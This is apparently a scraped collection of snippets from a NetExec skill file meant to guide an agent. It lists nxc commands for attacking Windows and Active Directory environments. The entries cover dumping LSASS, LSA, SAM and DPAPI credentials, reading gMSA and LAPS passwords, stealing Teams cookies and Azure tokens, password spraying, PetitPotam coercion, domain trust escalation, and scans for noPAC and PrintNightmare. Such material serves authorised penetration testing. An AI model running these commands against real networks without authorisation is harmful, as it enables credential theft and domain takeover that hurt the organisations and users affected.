coerce_plus -o METHOD=PetitPotam # or pe, dfs, pr ``` -------------------------------- ### Impersonate Logged-on Users Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Impersonates logged-on users to execute commands. Requires administrative privileges. ```bash nxc smb -u user -p pass -M schtask_as -o USER=targetuser CMD=whoami ``` -------------------------------- ### Check Spooler / WebDAV Service Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks if the spooler or WebDAV services are running on the target. ```bash nxc smb -u user -p pass -M spooler ``` ```bash nxc smb -u user -p pass -M webdav ``` -------------------------------- ### LDAP Authentication Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Performs basic authentication against an LDAP server. Supports Kerberos authentication with optional KDC host specification. ```bash nxc ldap -u user -p pass ``` ```bash nxc ldap -u user -p pass -k # Kerberos ``` ```bash nxc ldap -u user -p pass -k --kdcHost dc01.corp.local ``` -------------------------------- ### WinRM DPAPI Credential Dumping (No Admin) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Dumps DPAPI-protected credentials via WinRM without requiring administrator privileges; dumps current user credentials. ```bash nxc winrm -u user -p pass --dpapi # no admin needed — dumps current user creds ``` -------------------------------- ### LDAP User Enumeration Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Enumerates users from an LDAP server. Options include exporting to a file, filtering for active users, retrieving descriptions, and checking adminCount. ```bash nxc ldap -u user -p pass --users ``` ```bash nxc ldap -u user -p pass --users-export output.txt ``` ```bash nxc ldap -u user -p pass --active-users # Active (non-disabled) users only ``` ```bash nxc ldap -u user -p pass --get-user-descriptions # Users with descriptions ``` ```bash nxc ldap -u user -p pass --admin-count # Users with adminCount=1 ``` -------------------------------- ### RDP Screenshot (Unauthenticated) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Captures a screenshot from a target RDP host without authentication. Requires specifying screenshot duration. ```bash nxc rdp -u '' -p '' --screenshot --screentime 5 ``` -------------------------------- ### Audit Mode Configuration Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Enables audit mode to redact credentials from console output. Configure the redaction mask in ~/.nxc/nxc.conf. ```bash # Set: audit_mode = * (or any character to use as redaction mask) ``` -------------------------------- ### Find DCSync Rights Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Identifies principals that have DCSync rights on a target distinguished name. ```bash # Find who has DCSync rights nxc ldap dc.lab.local -k -M daclread -o TARGET_DN="DC=lab,DC=LOCAL" ACTION=readRIGHTS=DCSync ``` -------------------------------- ### Check Principal Rights on Target Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Checks the specific rights a given principal has on a target object. ```bash # Check what rights a specific principal has on a target nxc ldap dc.lab.local -k -M daclread -o TARGET=Administrator ACTION=read PRINCIPAL=BlWasp ``` -------------------------------- ### WinRM Credential Dumping (Admin) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Dumps credentials from the SAM and LSA secrets via WinRM, requiring administrator privileges. ```bash # Credential dumping (admin required) nxc winrm -u user -p pass --sam nxc winrm -u user -p pass --lsa ``` -------------------------------- ### LDAP Domain Information Gathering Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Gathers various domain information via LDAP, including Domain Controllers, Domain SID, trusts, MAQ value, GPO script paths, subnets, and LDAP signing configuration. ```bash nxc ldap -u user -p pass --dc-list # Domain Controllers ``` ```bash nxc ldap -u user -p pass --find-domain-sid # Domain SID ``` ```bash nxc ldap -u user -p pass --trusts # Domain trusts ``` ```bash nxc ldap -u user -p pass --machine-account-quota # MAQ value ``` ```bash nxc ldap -u user -p pass --get-scriptpath # GPO script paths ``` ```bash nxc ldap -u user -p pass --extract-subnet # Subnets from AD Sites ``` ```bash nxc ldap -u user -p pass --check-ldap-signing # LDAP signing config ``` -------------------------------- ### NTLM Reflection Vulnerability Scan (CVE-2025-33073) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Scans for NTLM Reflection vulnerabilities. Requires valid user credentials. ```bash nxc smb -u user -p pass -M ntlm_reflection ``` -------------------------------- ### BackupOperator Privilege Abuse Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Abuses BackupOperator privileges to gain access without local administrator rights, provided SeBackupPrivilege is held. ```bash nxc smb -u user -p pass -M backup_operator ``` -------------------------------- ### Azure/M365 Token Cache (WAM) Extraction Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Extracts Azure/M365 token cache data. Can also generate a master key file or extract a private key. ```bash nxc smb -u user -p pass -M wam ``` ```bash nxc smb -u user -p pass -M wam --mkfile masterkeys.txt ``` ```bash nxc smb -u user -p pass -M wam --pvk domain_backup_key.pvk ``` -------------------------------- ### Steal Teams Cookies Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Steals Teams cookies from the local machine. ```bash nxc smb -u user -p pass -M steal_teams_cookies ``` -------------------------------- ### Raise Child Domain Trust Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Performs domain trust escalation by raising a child domain. ```bash # raisechild — Domain Trust Escalation nxc ldap -u user -p pass -M raisechild ``` -------------------------------- ### Check for DENY ACEs Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Scans for DENY Access Control Entries (ACEs) on a target object. ```bash # Check for DENY ACEs nxc ldap dc.lab.local -k -M daclread -o TARGET=Administrator ACTION=read ACE_TYPE=denied ``` -------------------------------- ### Dump LSA Secrets via SMB Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Extracts secrets stored in the Local Security Authority (LSA) subsystem. Requires Domain Admin or Local Admin on a Domain Controller. ```bash nxc smb 192.168.1.0/24 -u Administrator -p 'Pass' --lsa ``` ```bash nxc smb 192.168.1.0/24 -u Administrator -p 'Pass' --lsa secdump ``` -------------------------------- ### noPAC / Sam-The-Admin Vulnerability Scan Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Scans for the noPAC / Sam-The-Admin vulnerability. Requires valid user credentials. ```bash nxc smb -u user -p pass -M nopac ``` -------------------------------- ### NetExec Global Flags Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Common flags that can be applied to any NetExec command to control threading, timeouts, and output verbosity. ```bash nxc -t THREADS ``` ```bash nxc --timeout TIMEOUT ``` ```bash nxc --jitter INTERVAL ``` ```bash nxc --no-progress ``` ```bash nxc --verbose ``` ```bash nxc --debug ``` -------------------------------- ### Change User Password Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Changes the password for a specified user account. ```bash nxc smb -u user -p pass --change-password newpassword ``` -------------------------------- ### Check Password Policy Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Retrieves the password policy of the target domain. Essential to check before performing password spraying. ```bash nxc smb -u user -p pass --pass-pol ``` -------------------------------- ### PrintNightmare Vulnerability Scan Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Scans for the PrintNightmare vulnerability. Does not require credentials. ```bash nxc smb -u '' -p '' -M printnightmare ``` -------------------------------- ### Read ACEs on Target Object Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Reads all Access Control Entries (ACEs) on a specified target object. ```bash # Read all ACEs on a target object nxc ldap dc.lab.local -k --kdcHost dc.lab.local -M daclread -o TARGET=Administrator ACTION=read ``` -------------------------------- ### Spider Shares with Content/Regex Filtering Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Spiders shares and filters files based on content or regular expression patterns. ```bash nxc smb -u user -p pass -M spider_plus -o PATTERN='password' ``` -------------------------------- ### Defeating LAPS (Read Password) Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Reads the LAPS password if the user has privileged access. ```bash nxc smb -u privilegeduser -p pass --laps ``` -------------------------------- ### Read gMSA DACL Rights Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Reads DACL rights for a specific gMSA ID. ```bash # Read DACL rights on gMSA nxc ldap -u user -p pass --gmsa-convert-id ``` -------------------------------- ### BloodHound Data Collection - DC Only Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Collects only Domain Controller data for BloodHound from the specified IP address. ```bash nxc ldap -u user -p pass --bloodhound --collection DCOnly ``` -------------------------------- ### File Transfer via SSH Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Use to transfer files between local and remote hosts via SSH. Specify source and destination paths. ```bash nxc ssh -u user -p pass --get-file /remote/file /local/file ``` ```bash nxc ssh -u user -p pass --put-file /local/file /remote/path/file ``` -------------------------------- ### SCCM Credentials Extraction Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Extracts credentials related to SCCM. Supports disk and WMI-based extraction. ```bash nxc smb -u user -p pass --sccm ``` ```bash nxc smb -u user -p pass --sccm disk ``` ```bash nxc smb -u user -p pass --sccm wmi ``` -------------------------------- ### Entra ID Enumeration Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Performs Entra ID (Azure AD) enumeration. ```bash # Entra ID enumeration nxc ldap -u user -p pass --entra-id ``` -------------------------------- ### MSSQL Password Spray Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Performs a password spray attack against SQL Server using lists of users and passwords, with an option to disable bruteforce. ```bash # Password spray nxc mssql -u ~/users.txt -p ~/passwords.txt --no-bruteforce ``` -------------------------------- ### Dump gMSA Passwords Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Dumps Group Managed Service Account (gMSA) passwords. Requires specific permissions and uses LDAPS automatically. ```bash # Dump gMSA passwords (requires right; uses LDAPS automatically) nxc ldap -u user -p pass --gmsa ``` -------------------------------- ### MSSQL Privilege Escalation - Rollback Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Rolls back privilege escalation changes made on the target SQL Server. ```bash # Rollback (after engagement) nxc mssql -u user -p pass -M mssql_priv -o ACTION=rollback ``` -------------------------------- ### S4U2Self Delegation Abuse Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Uses S4U2Self with a computer account to gain local admin privileges on the target. ```bash nxc smb -u 'COMPUTER$' -H --delegate Administrator --self ``` -------------------------------- ### LSASS Memory Dump Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Dumps LSASS memory for credential extraction using various modules. Requires administrative privileges. ```bash nxc smb -u Administrator -p 'Pass' -M lsassy ``` ```bash nxc smb -u Administrator -p 'Pass' -M nanodump ``` ```bash nxc smb -u Administrator -p 'Pass' -M mimikatz # deprecated ``` -------------------------------- ### Read LAPS Password Source: https://github.com/halilkirazkaya/netexec-skill/blob/main/SKILL.md Reads the LAPS password for a target machine. Requires a user with ReadLAPSPassword rights. Supports custom admin names. ```bash nxc smb -u laps-reader -p pass --laps ``` ```bash nxc smb -u laps-reader -p pass --laps customadminname # non-default admin name ```